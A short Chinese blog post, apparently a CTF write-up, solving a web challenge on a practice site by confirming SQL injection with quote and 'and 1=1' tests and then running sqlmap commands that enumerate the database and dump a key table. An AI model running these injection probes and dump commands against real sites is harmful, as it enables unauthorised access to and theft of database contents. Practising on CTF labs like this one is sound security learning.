CTF之web這道題很簡單
阿新 • • 發佈:2019-01-01
1、輸入【’】報錯,發現注入
2、輸入【and 1=1】正常,輸入【and 1=2】不正常,證明就是SQL注入
3、sqlmap進行SQL注入,這個可以通過linux虛擬機器進行操作,也可以直接在windows作業系統中安裝sqlmap進行操作,這個在我的部落格裡有相關介紹,部落格地址:http://blog.csdn.net/lijia1111,安裝好sqlmap後輸入一下指令:
檢視當前資料庫:
sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -v 1 --current-db
查看錶:
sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -v 1 -D my_db --tables
檢視列:
sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -v 1 -D my_db -T thiskey --columns
檢視key:
sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -v 1 -D my_db -T thiskey -C koy --dump
得到key值
如圖是我的操作過程:
1、檢視當前資料庫
2、查看錶
3、檢視列
4、檢視key的值
得到key的值,之前得到的不是正確的,因為當時把k0y看錯了。
sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -v 1 --dump -C koy -T thiskey -D my_db
當我對sqlmap瞭解更深入以後,才能輸入正確的指令,現在先不對sqlmap指令有深究。。。